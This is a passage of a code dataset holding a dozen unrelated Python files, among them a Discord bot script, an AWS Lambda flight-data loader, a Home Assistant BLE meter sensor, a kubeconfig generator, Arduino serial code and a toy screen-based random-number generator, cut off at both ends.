write_message(client, message, channel_id):\n channel = client.get_channel(channel_id)\n try:\n needle = \"[mention:\"\n mention_index = message.index(needle)\n after_mention_index = message[mention_index + len(needle):]\n end_index = after_mention_index.index(\"]\")\n disc_id = message[mention_index + len(needle):mention_index + len(needle) + end_index]\n mention_str = discord_client.get_mention_str(int(disc_id), GUILD_MAP[args.guild])\n\n message = message.replace(f\"{needle}{disc_id}]\", mention_str)\n\n except ValueError:\n pass\n\n await channel.send(client.insert_emotes(message))\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"guild\", choices=CHANNEL_MAP)\n\n args = parser.parse_args()\n\n input_stream = io.TextIOWrapper(sys.stdin.buffer, encoding='utf-8')\n lines = input_stream.readlines()\n\n if lines == []:\n print(\"Error: No message provided (should be input to stdin)\")\n exit(0)\n\n conf = Config()\n database_client = Database(conf)\n bet_client = BettingHandler(conf, database_client)\n betting_handlers = {game: get_betting_handler(game, conf, database_client) for game in SUPPORTED_GAMES}\n\n discord_client = DiscordClient(conf, database_client, bet_client)\n\n channel_id = CHANNEL_MAP[args.guild]\n message = \"\".join(lines)\n\n GUILD_MAP[\"test\"] = 512363920044982272\n\n discord_client.add_event_listener(\"onready\", write_message, discord_client, message, channel_id)\n\n discord_client.run(conf.discord_token)\n","repo_name":"mhso/IntFar","sub_path":"write_as_intfar.py","file_name":"write_as_intfar.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"6399287974","text":"import json\nimport requests\nimport boto3\nimport datetime\nimport pytz\nimport os\nfrom botocore.exceptions import ClientError\n\n\ndef get_secrets():\n secret_name = os.getenv('SECRET_NAME')\n region_name = os.getenv('REGION_NAME')\n\n # Create a Secrets Manager client\n session = boto3.session.Session()\n client = session.client(service_name='secretsmanager', region_name=region_name)\n\n try:\n get_secret_value_response = client.get_secret_value(\n SecretId=secret_name\n )\n except ClientError as e:\n raise e\n\n secrets = json.loads(get_secret_value_response['SecretString'])\n return secrets\n\n\ndef api_call(lat_home, lon_home, api_key):\n url = f\"https://adsbexchange-com1.p.rapidapi.com/v2/lat/{lat_home}/lon/{lon_home}/dist/250/\"\n\n headers = {\n \"X-RapidAPI-Key\": api_key,\n \"X-RapidAPI-Host\": \"adsbexchange-com1.p.rapidapi.com\"\n }\n response = requests.request(\"GET\", url, headers=headers)\n return response\n\n\ndef upload_json_to_s3(response, bucket_name, lat_home, lon_home):\n now_timestamp = datetime.datetime.now(pytz.timezone('US/Eastern')).strftime(\"%Y%m%d-%H%M%S\")\n out_key = f'adsb_raw/adsb_{lat_home}_{lon_home}_250--{now_timestamp}.json'\n\n s3 = boto3.client('s3')\n s3.put_object(\n Body=response.text,\n Bucket=bucket_name,\n Key=out_key\n )\n return out_key\n\n\ndef main():\n\n secrets = get_secrets()\n\n bucket_name = secrets[os.getenv('KEY_BUCKET_NAME')]\n lat_home = secrets[os.getenv('KEY_HOME_LATITUDE')]\n lon_home = secrets[os.getenv('KEY_HOME_LONGITUDE')]\n api_key = secrets[os.getenv('KEY_ADBS_EXCHANGE_API_KEY')]\n\n response = api_call(lat_home=lat_home, lon_home=lon_home, api_key=api_key)\n out_key = upload_json_to_s3(response=response, lat_home=lat_home, lon_home=lon_home, bucket_name=bucket_name)\n\n return f\"{response.json()['msg']} Processed records:{response.json()['total']} ctime{response.json()['total']} s3://{bucket_name}/{out_key}\"\n\n\ndef handler(event, context):\n result = main()\n\n return {\n 'headers': {'Content-Type': 'application/json'},\n 'statusCode': 200,\n 'body': json.dumps({\"message\": f\"skyeyeLark invoked. {result}\",\n \"event\": event})\n }\n","repo_name":"MatthewHanni/sky-eye","sub_path":"lark_api_extract_load/src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35928660609","text":"from time import sleep\r\nfrom datetime import timedelta, datetime\r\nimport aioblescan as aiobs\r\nimport asyncio\r\nimport time\r\nfrom homeassistant.helpers.entity import Entity\r\nfrom homeassistant.helpers.event import async_track_time_interval\r\nimport random\r\nimport logging\r\nfrom homeassistant.const import (VOLUME_LITERS, STATE_UNKNOWN)\r\n\r\n_LOGGER = logging.getLogger(__name__)\r\ninf={}\r\n\r\ndef update_counters(call):\r\n global scan_duration\r\n def my_process(data):\r\n if time.time()-start >int(scan_duration):\r\n btctrl.stop_scan_request()\r\n conn.close()\r\n event_loop.stop()\r\n ev=aiobs.HCI_Event()\r\n xx = ev.decode(data)\r\n try:\r\n mac = ev.retrieve(\"peer\")[0].val\r\n except:\r\n return\r\n if str(mac).find('b0:01:02') !=-1:\r\n manufacturer_data = ev.retrieve(\"Manufacturer Specific Data\") \r\n payload = manufacturer_data[0].payload\r\n payload = payload[1].val \r\n c_num = int.from_bytes(payload[6:8], byteorder='little')\r\n c_count = int.from_bytes(payload[9:12], byteorder='little')\r\n inf[c_num] = c_count/10\r\n start = time.time()\r\n event_loop = asyncio.new_event_loop()\r\n asyncio.set_event_loop(event_loop)\r\n mysocket = aiobs.create_bt_socket(0)\r\n fac=event_loop._create_connection_transport(mysocket,aiobs.BLEScanRequester,None,None)\r\n conn,btctrl = event_loop.run_until_complete(fac)\r\n btctrl.process=my_process\r\n btctrl.send_scan_request()\r\n\r\n try:\r\n event_loop.run_forever()\r\n except KeyboardInterrupt:\r\n print('keyboard interrupt')\r\n finally:\r\n print('closing event loop')\r\n btctrl.stop_scan_request()\r\n conn.close()\r\n event_loop.close()\r\n\r\n \r\ndef setup_platform(hass, config, add_entities, discovery_info=None):\r\n global scan_interval, scan_duration\r\n ha_entities=[]\r\n _LOGGER.error(config)\r\n scan_interval = config['scan_interval']\r\n scan_duration = config['scan_duration']\r\n for device in config['devices']: \r\n ha_entities.append(ExampleSensor(device['id'],device['name']))\r\n inf[device['id']]=STATE_UNKNOWN\r\n add_entities(ha_entities, True)\r\n async_track_time_interval(\r\n hass, update_counters, scan_interval\r\n )\r\n \r\n\r\n\r\nclass ExampleSensor(Entity):\r\n \"\"\"Representation of a Sensor.\"\"\"\r\n\r\n def __init__(self,counter_num, name):\r\n \"\"\"Initialize the sensor.\"\"\"\r\n self._state = None\r\n self._name = name\r\n self._state = STATE_UNKNOWN\r\n self._num = counter_num\r\n\r\n\r\n @property\r\n def name(self):\r\n \"\"\"Return the name of the sensor.\"\"\"\r\n return self._name\r\n\r\n @property\r\n def state(self):\r\n \"\"\"Return the state of the sensor.\"\"\"\r\n return self._state\r\n\r\n @property\r\n def unit_of_measurement(self):\r\n \"\"\"Return the unit of measurement.\"\"\"\r\n return VOLUME_LITERS\r\n @property\r\n def icon(self):\r\n \"\"\"Return the unit of measurement.\"\"\"\r\n return 'mdi:water-pump'\r\n @property\r\n def unique_id(self):\r\n \"\"\"Return Unique ID \"\"\"\r\n return 'elehant_'+str(self._num)\r\n\r\n def update(self):\r\n \"\"\"Fetch new state data for the sensor.\r\n This is the only method that should fetch new data for Home Assistant.\r\n \"\"\" \r\n # update_counters() \r\n self._state = inf[self._num]\r\n","repo_name":"nemoyar/elehant_water","sub_path":"custom_components/elehant_water/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":3446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"4511201100","text":"# Done as per https://github.com/kelseyhightower/kubernetes-the-hard-way/blob/master/docs/05-kubernetes-configuration-files.md\n\nimport json\nimport pathlib\n\nfrom network import external_ips, in_vagrant, wireguard_ips\nfrom utils import run_command, set_file_contents\n\nkc_folder = None\nssl_folder = None\nssl_config_folder = pathlib.Path(\"./ssl/\")\n\nca_pem = None\n\nkubectl = pathlib.Path(__file__).parents[2].joinpath(\"kubectl\")\n\n\ndef make_configs(public_address):\n for name in [\n \"admin\",\n \"kube-controller-manager\",\n \"kube-proxy\",\n \"kube-scheduler\",\n \"service-account\",\n \"cni\",\n ]:\n make_config(name, public_address)\n\n\ndef make_config(name, public_address):\n kc = kc_folder.joinpath(f\"{name}.kubeconfig\")\n cert = ssl_folder.joinpath(f\"{name}.pem\")\n key = ssl_folder.joinpath(f\"{name}-key.pem\")\n newest_dep = sorted([x.stat().st_mtime for x in [ca_pem, cert, key]], reverse=True)[\n 0\n ]\n if kc.exists() and newest_dep < kc.stat().st_mtime:\n return\n run_command(\n f\"\"\"\n{kubectl} config set-cluster app \\\n --certificate-authority={ca_pem} \\\n --embed-certs=true \\\n --server=https://{public_address}:6443 \\\n --kubeconfig={kc}\"\"\",\n )\n\n run_command(\n f\"\"\"\n {kubectl} config set-credentials system:{name} \\\n --client-certificate={cert} \\\n --client-key={key} \\\n --embed-certs=true \\\n --kubeconfig={kc}\"\"\",\n )\n\n run_command(\n f\"\"\"\n {kubectl} config set-context default \\\n --cluster=app \\\n --user=system:{name} \\\n --kubeconfig={kc}\"\"\",\n )\n\n run_command(f\"\"\"{kubectl} config use-context default --kubeconfig={kc}\"\"\")\n\n run_command(f\"touch {kc}\")\n\n\ndef make_node_config(host, public_address):\n kc = kc_folder.joinpath(f\"{host['name']}.kubeconfig\")\n kc_config = str(kc) + \".config\"\n cert = ssl_folder.joinpath(f\"keys-{host['name']}.pem\")\n key = ssl_folder.joinpath(f\"keys-{host['name']}-key.pem\")\n\n newest_dep = sorted([x.stat().st_mtime for x in [ca_pem, cert, key]], reverse=True)[\n 0\n ]\n changed = set_file_contents(kc_config, json.dumps({\"address\": public_address}))\n if (not changed) and kc.exists() and newest_dep < kc.stat().st_mtime:\n return\n\n run_command(\n f\"\"\"\n {kubectl} config set-cluster app \\\n --certificate-authority={ca_pem} \\\n --embed-certs=true \\\n --server=https://{public_address}:6443 \\\n --kubeconfig={kc}\"\"\",\n )\n\n run_command(\n f\"\"\"\n {kubectl} config set-credentials system:node:{host['name']} \\\n --client-certificate={cert} \\\n --client-key={key} \\\n --embed-certs=true \\\n --kubeconfig={kc}\"\"\",\n )\n\n run_command(\n f\"\"\"\n {kubectl} config set-context default \\\n --cluster=app \\\n --user=system:node:{host['name']} \\\n --kubeconfig={kc}\"\"\",\n )\n\n run_command(\n f\"\"\"{kubectl} config use-context default --kubeconfig={kc}\"\"\",\n )\n\n run_command(f\"touch {kc}\")\n\n\ndef main(config):\n global ssl_folder, ca_pem, kc_folder\n ssl_folder = pathlib.Path(config[\"data_path\"]).joinpath(\"ssl\")\n ca_pem = ssl_folder.joinpath(\"ca.pem\")\n kc_folder = pathlib.Path(config[\"data_path\"]).joinpath(\"kubeconfig\")\n\n wg = wireguard_ips()\n KUBERNETES_PUBLIC_ADDRESS = list(wg.values())[0]\n\n make_configs(KUBERNETES_PUBLIC_ADDRESS)\n if in_vagrant():\n make_config(\"vagrant\", \"127.0.0.1\")\n else:\n ext_ip = list(external_ips().values())[0]\n make_config(\"external\", ext_ip)\n for server in config[\"servers\"]:\n make_node_config(server, KUBERNETES_PUBLIC_ADDRESS)\n","repo_name":"palfrey/on-infrastructure","sub_path":"mitogen/kubernetes/kubeconfig.py","file_name":"kubeconfig.py","file_ext":"py","file_size_in_byte":3625,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71053846865","text":"#!/usr/bin/env python3.6\n# -*- Coding: UTF-8 -*-\n\"\"\"\nSearch for common elements in matrix.\nThe search is based in logical programming filosophy\nBy: E. S. Pereira\nVersion: 0.0.1\nDate: 12/09/2017\n\"\"\"\nfrom collections import OrderedDict\n\nfrom functools import reduce\nfrom itertools import product\nfrom numpy import where, array, intersect1d, in1d, concatenate\n\n\ndef _sub_common(result, common, match, args, hargs):\n if len(hargs) == 1:\n for i in match:\n if match[i][1] == hargs:\n return common[i], []\n\n for j, argi in enumerate(args):\n if all(k in argi for k in hargs):\n for i in match:\n if match[i][0] == j:\n to_get = [argi.index(hi) for hi in hargs]\n to_search = argi.index(match[i][1][0])\n lines = in1d(result[j][:, to_search], common[i]).nonzero()\n finalr = concatenate([result[j][lines, tgi]\n for tgi in to_get]).T\n break\n return finalr, []\n\n\ndef _in_common(result, args, hargs):\n common = []\n match = OrderedDict()\n\n for i, vali in enumerate(args):\n tmp = []\n for j, valj in enumerate(args[i + 1:], start=i + 1):\n if any(k in valj for k in vali):\n uniao = list(set(valj) & set(vali))\n match[i] = [j, uniao]\n to_search = [where(array(l) == uniao)[0] for l in [vali, valj]]\n tmp.append(result[i][:, to_search[0]])\n tmp.append(result[j][:, to_search[1]])\n if tmp:\n\n in_array = array(reduce(intersect1d, tmp))\n common.append(in_array)\n\n # if we have 4 inputs, and, we are compare each by each,\n # the max size of the Common list will be input size less one\n # If the size of common is lower than the size of args less one, for\n # some predicate, no value was found, and the rule is not true for all body\n # component.\n\n if len(common) < len(args) - 1:\n return [], []\n\n return _sub_common(result, common, match, args, hargs)\n\n\ndef in_common(result, args, hargs):\n \"\"\"\n Given a list o result and a list of args, return the common elements\n where the relation is mapping by args.\n \"\"\"\n\n uniao = None\n if len(args) == 1:\n return result[0]\n\n for i in args:\n if uniao is None:\n uniao = set(i)\n else:\n uniao = uniao & set(i)\n uniao = list(uniao)\n if uniao:\n to_search = [where(array(i) == uniao)[0] for i in args]\n tmp = [result[j][:, to_search[j]] for j in range(len(result))]\n common = array(reduce(intersect1d, tmp))\n\n return common, uniao\n\n return _in_common(result, args, hargs)\n\n\ndef concatenate_result(node, result, uniao, common, predicate):\n '''\n Given a array of results, the union args, the common values and a predicate\n concatenete the body result in a new result.\n '''\n\n tmp = []\n for i, item in enumerate(result):\n test = node.children_args[i][:]\n for uni in uniao:\n if uni in test:\n test.remove(uni)\n\n if test:\n tmp2 = []\n for cmi in common:\n for uni in uniao:\n to_get = where(~(array(node.children_args[i]) == uni))[0]\n to_search = where(array(node.children_args[i]) == uni)[0]\n tmp2 += item[:,\n to_get][where(item[:, to_search] == cmi)[0]\n ].T.tolist()\n\n tmp.append(tmp2)\n else:\n\n if [node.data[predicate].index(uni) for uni in uniao\n if uni in node.data[predicate]]:\n listcommon = [[cmk] for cmk in common.T.tolist()]\n tmp.append(listcommon)\n tmp2 = []\n\n for i in range(len(tmp[0])):\n tmp2.append(\n array(list(product(*[tmp[j][i] for j in range(len(tmp))]))))\n if tmp2:\n print(tmp2)\n node.result = concatenate(tmp2)\n","repo_name":"duducosmos/logml","sub_path":"commonsearch.py","file_name":"commonsearch.py","file_ext":"py","file_size_in_byte":4055,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41988738405","text":"# coding: utf-8\nfrom machine import UART\nimport select\nfrom time import sleep\nfrom _thread import start_new_thread\n\nclass ArduinoTele():\n def __init__(self):\n self.clear()\n\n def clear(self):\n self.data = \"\"\n self.isRecving = False\n\nclass ArduinoConn():\n _STX = 0x02\n _ETX = 0x03\n\n @staticmethod\n def _startRecvThread(func, args):\n print(\"_startRecvThread\")\n start_new_thread(func, args)\n\n def __init__(self, id=2, baud=115200):\n self._uart = UART(id, baud)\n\n def init(self, txPin=None, rxPin=None):\n self._uart.init(tx=txPin, rx=rxPin)\n\n def startRecvThread(self, callback):\n print(\"startRecvThread\")\n ArduinoConn._startRecvThread(self._recv, (callback,))\n print(\"startRecvThread end\")\n\n def send(self, message):\n buf = bytearray(chr(ArduinoConn._STX)) + bytearray(message.encode()) + bytearray(chr(ArduinoConn._ETX))\n self._uart.write(buf)\n\n def _recv(self, callback):\n tele = ArduinoTele()\n poller = select.poll()\n poller.register(self._uart, select.POLLIN)\n\n while True:\n events = poller.poll()\n print('events =', events)\n while self._uart.any():\n buf = self._uart.read(1)\n print(buf)\n if buf[0] == ArduinoConn._STX:\n print(\"-> STX\")\n tele.clear()\n tele.isRecving = True\n elif buf[0] == ArduinoConn._ETX:\n print(\"-> ETX\")\n if tele.isRecving:\n print(tele.data)\n callback(tele)\n tele.clear()\n elif tele.isRecving:\n tele.data += buf.decode()\n","repo_name":"Monorium/omega-comm-part","sub_path":"arduinoconn.py","file_name":"arduinoconn.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19456486024","text":"from __future__ import (absolute_import, division,\n print_function, unicode_literals)\n\nfrom copy import deepcopy\nimport datetime\nfrom decimal import Decimal\nfrom future.utils import iteritems\nimport inspect\nimport json\nimport operator\nimport os\nfrom random import Random\nfrom six import with_metaclass\n\nfrom sqlalchemy.inspection import inspect as sqlalchemy_inspect\n\n\n# Watch when new FixtureUppers are created and register them to the class's global dictionary\nclass UpperWatcher(type):\n def __init__(cls, name, bases, clsdict):\n cls._UPPER_KEY = cls.get_upper_class_key()\n if cls._UPPER_KEY:\n cls._upper_classes[cls._UPPER_KEY] = cls\n super(UpperWatcher, cls).__init__(name, bases, clsdict)\n\n\nclass BaseFixtureUpper(with_metaclass(UpperWatcher, object)):\n _upper_classes = {}\n upper_aliases = {}\n all_fixtures_order = []\n\n def __init__(self, start_id=1, seed=None, upper_instances=None, **kwargs):\n self.start_id = start_id\n self.seed = seed\n\n self.fixtures = []\n self.defaults = getattr(self, 'defaults', {})\n self.seed_random()\n\n if upper_instances is None:\n upper_instances = {}\n\n self.upper_instances = upper_instances\n\n # Save most recent instance of upper\n # to upper map\n if getattr(self, '_UPPER_KEY', None):\n self.upper_instances[self._UPPER_KEY] = self\n\n @classmethod\n def get_upper_class_key(cls):\n # Don't register Base Fixture Upper Classes\n if cls.__name__ == 'BaseFixtureUpper':\n return None\n\n key = cls.__name__\n if key in cls._upper_classes:\n raise Exception('Fixture Upper with name %s exists, use another name' % key)\n return key\n\n @classmethod\n def sorted_fixtures_key(cls, f):\n return f\n\n def get_all_fixtures(self):\n list_of_lists = iter([\n instance.fixtures\n for key, instance\n in iteritems(self.upper_instances)\n ])\n return sorted(\n iter([fixture for fixture_list in list_of_lists for fixture in fixture_list]),\n key=self.sorted_fixtures_key\n )\n\n def seed_random(self, seed=None):\n seed = seed or self.seed\n self.random = Random()\n self.random.seed(seed)\n\n def get_passed_kwarg_keys(self):\n return ['start_id', 'seed']\n\n def get_upper(self, key, **kwargs):\n # Get alias of key if available\n key = self.upper_aliases.get(key, key)\n\n if key not in self.upper_instances:\n kwargs['upper_instances'] = self.upper_instances\n\n for kw in self.get_passed_kwarg_keys():\n if not kwargs.get(kw):\n kwargs[kw] = getattr(self, kw)\n\n self._upper_classes[key](**kwargs)\n return self.upper_instances[key]\n\n def randint(self, *args):\n return self.random.randint(*args)\n\n def override_defaults(self, defaults):\n # Make sure global class defaults are not overridden\n self.defaults = dict(deepcopy(self.defaults), **defaults)\n\n def reset_defaults(self):\n self.defaults = self.__class__.defaults\n\n def fixup(self, **kwargs):\n raise NotImplementedError\n","repo_name":"Rhathe/fixtureupper","sub_path":"fixtureupper/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24245347700","text":"# External imports\nfrom aws_cdk import aws_events\nfrom constructs import Construct\n\n\nclass EventRuleConstruct(Construct):\n \"\"\"\n Construct to create an AWS EventBridge Rule with allow-all event pattern.\n \"\"\"\n\n def __init__(\n self,\n scope: Construct,\n id: str,\n event_bus: aws_events.EventBus,\n rule_name: str,\n ) -> None:\n \"\"\"\n :param scope (Construct): The scope in which to define this construct.\n :param id (str): The scoped construct ID. Must be unique amongst siblings.\n :param event_bus (aws_events.EventBus): AWS EventBridge Bus resource.\n :param rule_name (str): Name of the EventBridge Rule to create.\n \"\"\"\n super().__init__(scope, id)\n\n self.event_rule = aws_events.Rule(\n self,\n \"EventBridge-Rule\",\n rule_name=rule_name,\n event_pattern=aws_events.EventPattern(\n source=aws_events.Match.prefix(\"\"), # Do not filter anything\n ),\n event_bus=event_bus,\n enabled=True,\n )\n","repo_name":"san99tiago/aws-cdk-multiple-experiments","sub_path":"cross_account_event_notifications/hub_account/stacks/custom_constructs/event_rule_construct.py","file_name":"event_rule_construct.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"3110055422","text":"#Exception\n\n\n#Handling Exception\n\ndef exception1() :\n try:\n x = int(input(\"Enter a number : \"))\n print(\"You entered \" + str(x))\n except ValueError :\n print(\"ooooppppss you got an exception\")\n \n\n'''\noutput\n\n>>> exception1()\nEnter a number : 34\nYou entered 34\n>>> exception1()\nEnter a number : ddn\nooooppppss you got an exception\n\n'''\n\n\n\n\n\n#Multiple Exception\n#default Exception handliing\n#Finally block\n\n\ndictionary = {\"1\" : 89 , \"2\" : 45 }\n\nimport sys\n\ndef exception2() :\n try:\n #ValueError\n x = int(input(\"Enter a number : \"))\n print(\"You entered \" + str(x))\n\n #ArithmeticError \n y = 10 / x\n print(\"10 / \" + str(x) + \" = \" + str(y))\n\n #Default\n z = dictionary[\"1exception2()\"]\n print(str(z))\n \n except ValueError :\n print(\"oops you got a ValueError exception\")\n except ArithmeticError :\n print(\"oops! you got an Arithmetic exception\")\n except :\n print(\"default exception \" )\n\n else:\n print(\"In else clause\")\n \n finally :\n print(\"In finally block\")\n \n\n\n\n\n\n\n\n#Raising Exception\n\ndef exception3() :\n try :\n raise NameError(\"Hi there\")\n except NameError:\n print(\"You got an exception\")\n raise\n\n\n\n\n\n\n\n\n#User Defined Exception\n\nclass MyException(Exception):\n def __init__(self, value1, value2):\n self.value = value2\n def __str__(self):\n return \"This will be printed whenever you print exception object \" + str(self.value)\n\ndef exception4() :\n try :\n raise MyException(2*2 , 45)\n except MyException as e:\n print(\"Value \" + str(e.value))\n print(\"you got exception \" + str(e) )\n \n","repo_name":"rajpatel29/Python","sub_path":"0_Exception.py","file_name":"0_Exception.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24746736943","text":"#!/usr/bin/env python\nimport time\nimport random as ra\nimport pyautogui\nfrom threading import Thread \n\nstart_time = time.time()\nA=[] \t\t\t\t\t\t\t\t#Αρχικοποίηση λιστων για τις συντεταγμένες και τις τιμες του RGB A = x B = y\nB=[]\nRed=[]\nGreen=[]\nBlue=[]\n\nprint(\"**********************************************************************************\")\nprint(\"* The Random Generator Will run with 10 threads for almost 20 secs, gathering info\")\nprint(\"* Including mouse position and RGB values from your screen.\")\nprint(\"* Then it will give you the Number out of your entropy\") \nprint(\"* Threads can run parallel to each other so it won't take any longer.\")\nprint(\"* For Better results feel free to use your Computer\")\nprint(\"**********************************************************************************\")\n\ndef myfunc(i):\n\tran = ra.randrange(20) \t\t\t\t\t\t#Τυχαία επιλογή των δευτερολέπτων που θα τρέξει το κάθε Thread\n\t#print(\"thread: %d will sleep for seconds %d , \\n When it will wake up it will pick the mouse location in random time! \"%(i,ran))\n\ttime.sleep(ran)\t\t\t\t\t\t\t\t#Κοίμησε το Τhread για ran δευτερόλεπτα\n\t\n\tx,y = pyautogui.position()\t\t\t\t\t#Αποθήκευση συντεταγμένων της οθόνης.\n\tr,g,bl = pyautogui.pixel(x,y)\t\t\t\t#Αποθήκευση των τιμών RGB των Pixel από τις συντεταγμένες τις οθόνης.\n\t\n\t#print(\"awaken %d with values x=: %d and y: %d\\n\"%(i,x,y))\n\t\n\tA.append(x)\t\t\t\t\t\t\t\t\t#Αποθήκευσε την τιμή του x στην λιστα Α\n\tB.append(y)\t\t\t\t\t\t\t\t\t#Αποθήκευσε την τιμή του y στην λιστα B\n\tRed.append(r)\t\t\t\t\t\t\t\t#Αποθήκευσε την τιμή του r στην λιστα Red\n\tGreen.append(g)\t\t\t\t\t\t\t\t#Αποθήκευσε την τιμή του g στην λιστα Green\n\tBlue.append(bl)\t\t\t\t\t\t\t\t#Αποθήκευσε την τιμή του b στην λιστα Blue\n\t\n\n\nfor i in range(10):\t\t\t\t\t\t\t\t#Από 0 εως 9 \n\tt=Thread(target=myfunc, args=(i,))\t\t\t#Με στόχο το myfunc φτίαξε i threads\n\tt.start()\n\nfor i in range(0, len(A)):\t\t\t\t\t\t#Μετατροπή της Λιστας σε integer!\n\tA[i] = int(A[i])\n\t\nfor i in range(0, len(B)):\n\tB[i] = int(B[i])\n\t\nfor i in range(0, len(Red)):\n\tRed[i] = int(Red[i])\n\t \nfor i in range(0, len(Green)):\n\tGreen[i] = int(Green[i])\n\t\nfor i in range(0, len(Blue)):\n\tBlue[i] = int(Blue[i])\n\t\n\t\ntime.sleep(20)\t\t\t\t\t\t\t\t\t#Κοιμήσου για 20 δευτερόλεπτα περιμένοντας τα Threads να τελειώσουν\nRandomNumber= (A + B + Red + Blue +Green)\t\t#πρόσθεσε όλες τις λίστες σε μία\nSum=sum(RandomNumber)\t\t\t\t\t\t\t#πρόσθεσε τα δεδομένα όλων των λιστών σε ενα ιnt\nSumA = sum(A)\t\t\t\t\t\t\t\t\t\t#πρόσθεσε τα δεδομένα της λίστας Α σε ενα ιnt\nSumB=sum(B)\nSumRed=sum(Red)\nSumGreen=sum(Green)\nSumBlue=sum(Blue)\n\n\n\n#print(*A+B+Red+Blue+Green, sep = \" \")\npick = ra.randrange(5)\n\t\nif pick == 0:\n\tRandom_number = ((Sum*SumA)-2)/10000\t\t\t#Υπολογισμός του Random Number!\nelif pick == 1:\n\tRandom_number = ((Sum*SumB)-2)/10000\nelif pick == 2:\n\tRandom_number = ((Sum*SumRed)-2)/10000\nelif pick == 3:\n\tRandom_number = ((Sum*SumGreen)-2)/10000\nelif pick == 4:\n\tRandom_number = ((Sum*SumBlue)-2)/10000\n\t\t\nend_time = time.time()\n\ntime_value = end_time - start_time\n\n\nprint(\"\\n\")\nprint(\"**********************************************************************************\")\nprint(\"\\t\\t\\tΤιμές Λιστών\")\nprint(\"\\n* Τιμές χ\",*A, sep = \", \")\nprint(\"\\n* Τιμές y\",*B, sep = \", \")\nprint(\"\\n* Τιμές Red\",*Red, sep = \", \")\nprint(\"\\n* Τιμες Green\",*Green, sep = \", \")\nprint(\"\\n* Τιμες Βlue\",*Blue,sep = \", \")\nprint(\"**********************************************************************************\")\nprint(\"\\n\")\t\nprint(\"**********************************************************************************\")\nprint(\"\\t\\t\\tΕκτύπωση Αποτελεσμάτων\")\nprint(\"\\n* Random Number is : %d \\n\"%(Random_number))\nprint(\"* Time the program ran %d seconds\"%time_value)\nprint(\"**********************************************************************************\")\nexit()\n\n\n","repo_name":"giannisjv/Multithreaded-Random-Generator","sub_path":"randgen.py","file_name":"randgen.py","file_ext":"py","file_size_in_byte":4305,"program_lang":"python","lang":"el","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3915761536","text":"#!/usr/bin/env python3\nimport sys\nfrom PIL import Image\n\nimgPath = sys.argv[1]\nimg = Image.open(imgPath)\nimg2 = img.resize((1,1))\ncolor = img2.getpixel((0,0))\nluminance = ( 0.299 * color[0] + 0.587 * color[1] + 0.114 * color[2] )/255\nif (luminance > 0.5):\n print(\"000000FF\")\nelse:\n print(\"FFFFFFFF\")\n","repo_name":"chnhkk/dotfiles-minimal","sub_path":"pywalScript/getLuminance-rgba.py","file_name":"getLuminance-rgba.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26716954664","text":"from nonebot import Bot\nfrom nonebot.internal.adapter import Event\nfrom nonebot.internal.matcher import Matcher\nfrom nonebot_plugin_session import Session\nfrom ssttkkl_nonebot_utils.interceptor.handle_error import handle_error\n\nfrom .mapper.season_user_point_mapper import map_season_user_point\nfrom .mg import matcher_group\nfrom .utils.dep import UserDep, GroupDep, RunningSeasonDep, SessionDep, UnaryArg, SenderUserDep, IsGroupAdminDep\nfrom .utils.general_handlers import require_store_command_args, require_platform_group_id, require_platform_user_id\nfrom .utils.parse import parse_float_or_error\nfrom .utils.send_msg import send_msg\nfrom ..model import Group, User, Season\nfrom ..model.identity import get_platform_group_id\nfrom ..service.season_user_point_service import reset_season_user_point, change_season_user_point_manually\nfrom ..utils.nickname import get_user_nickname\nfrom ..utils.nonebot import default_cmd_start\n\n# ========== 设置用户PT ==========\nset_season_user_point_matcher = matcher_group.on_command(\"设置用户PT\", aliases={\"设置用户pt\", \"设置PT\", \"设置pt\"}, priority=5)\nset_season_user_point_matcher.__help_info__ = f\"{default_cmd_start}设置PT [@<用户>]\"\n\nrequire_store_command_args(set_season_user_point_matcher)\nrequire_platform_group_id(set_season_user_point_matcher)\nrequire_platform_user_id(set_season_user_point_matcher, use_sender_on_group_message=False)\n\n\n@set_season_user_point_matcher.handle()\n@handle_error()\nasync def set_season_user_point_confirm(bot: Bot, matcher: Matcher, session: Session = SessionDep(),\n user: User = UserDep(use_sender=False),\n pt=UnaryArg(parser=lambda x: parse_float_or_error(x, 'PT')),\n group_admin=IsGroupAdminDep()):\n await send_msg(f\"确定设置用户[{await get_user_nickname(bot, user.platform_user_id, get_platform_group_id(session))}]\"\n f\"PT为{pt}吗?(y/n)\")\n await matcher.pause()\n\n\n@set_season_user_point_matcher.handle()\n@handle_error()\nasync def set_season_user_point_end(event: Event, matcher: Matcher,\n group: Group = GroupDep(),\n user: User = UserDep(use_sender=False),\n operator: User = SenderUserDep(),\n season: Season = RunningSeasonDep(),\n pt=UnaryArg(parser=lambda x: parse_float_or_error(x, 'PT'))):\n if event.get_message().extract_plain_text() == 'y':\n sup = await change_season_user_point_manually(season.id,\n group.id, user.id,\n pt,\n operator.id)\n msg = await map_season_user_point(sup, season)\n msg += \"\\n\\n设置用户PT成功\"\n await send_msg(msg)\n else:\n await matcher.finish(\"取消设置用户PT\")\n\n\n# ========== 重置用户PT 